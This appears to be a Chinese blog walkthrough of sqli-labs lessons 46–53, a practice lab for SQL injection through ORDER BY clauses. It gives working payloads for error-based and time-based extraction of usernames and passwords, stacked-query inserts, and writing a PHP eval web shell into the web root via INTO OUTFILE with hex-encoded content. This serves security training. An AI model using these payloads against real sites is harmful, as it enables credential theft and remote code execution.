Loading

sqli-labs lesson 46-53

写在前面:

关于 order by

例: select * from users order by 1 ;   将users表中的第1列按照从小到大依次排列

   select * from users order by 2 ;   将users表中的第2列按照从小到大依次排列

   ...........

 

 也可以在后面加desc或者asc指定降序或者升序

例: select * from users order by 1 desc  使用降序排列

 

 

 right() 函数:

和之前盲注用的left函数类似,只是从右往左开始计数。

 

 

lines terminated xxx    文件以xxx为结尾

 

 最后写好的文件会以666为结尾。

 

less 46

观察源码:

发现sql语句为:$sql = "SELECT * FROM users ORDER BY $id";

并且传入的值是sort 将sort赋值给id ,并且参数没有进行包裹

 

但是这里用union select  有错误 所以下面提供两个方法。

1.报错注入

利用updatexml函数进行报错注入

payload:?sort=1 and updatexml(1,   concat(0x7e,  (select concat_ws(0x7e,username,password) from security.users limit 0,1) ,0x7e)  ,1) --+

 

 

2.延时注入

?sort=1 and if (left(database(),1)>'a',1,sleep(5)) --+

如果执行成功返回1,执行失败延时5s

 

 剩下的步骤就是挨个名称和字母进行猜解即可。

 

less 47

与less 46的区别是参数加了单引号包裹,其余步骤一样。

 

less 48

与less 46相比没有了错误回显,只能使用延时注入。

 

less 49

与less 48相比 同样没有错误回显,只能使用延时注入,但是注意参数有了单引号包裹。

 

以上。也可用 into outfile方法 例如:

http://127.0.0.1/sqli-labs-master/Less-49/?sort=3' into outfile "C:\\phpstudy1\\PHPTutorial\\WWW\\sqli-labs-master\\Less-49\\mmm.php" --+

 

 

 

 可以导出文件,我们下面尝试使用一句话木马进行操作。

?sort=3'and (select '<?php @eval($_POST[zzw]);?>') into outfile "C:\\phpstudy1\\PHPTutorial\\WWW\\sqli-labs-master\\Less-49\\mmm.php" --+

执行后发现导出的文件和之前的txt的文件没什么区别:

 

 所以这时候就需要用到 lines terminated by 0xXXXXXXXXXXXXXXX

这里将我们上面的一句话木马转换为十六进制。

构造payload为:

?sort=3' into outfile "C:\\phpstudy1\\PHPTutorial\\WWW\\sqli-labs-master\\Less-49\\less-49.php" lines terminated by 0x273c3f70687020406576616c28245f504f53545b7a7a775d293b3f3e27 --+

 

 成功写入了一句话木马,之后连接中国菜刀即可。

 

 

从less 50 - less 53 结合了堆叠注入和基于order by 语句的注入

因为这几关使用了mysql_fetch_assoc()函数,这个可以针对多个语句的数据库查询

 

less 50

1.延时注入:

构造payload:

http://127.0.0.1/sqli-labs-master/Less-50/?sort=3 and if( left(database(),1)>'a',1,sleep(2))

如果正确返回1可以回显查询的表,错误会一直转圈,基本也是猜解

 

 2.报错注入:

构造payload:

?sort=1 and updatexml(1,   concat(0x7e,  (select concat_ws(0x7e,username,password) from security.users limit 0,1) ,0x7e)  ,1) --+

 

 3.使用一句话木马,原理和less 49一致

4.堆叠注入:

?sort=1;insert into users(id,username,password) values('50','less50','50') --+

 

 

 

less 51

与less 50不同的就是 参数被单引号包裹,并且也是有报错回显,注意闭合单引号即可。

 

less 52

与less 50不同的就是 参数没有被单引号包裹,没有错误回显不可以使用报错注入。注意闭合单引号即可,不再详细赘述

 

less 53

与less 52基本一致,只是参数被单引号包裹。不能使用报错注入

 

posted @ 2020-03-17 19:09  Zh1z3ven  阅读(212)  评论(0编辑  收藏  举报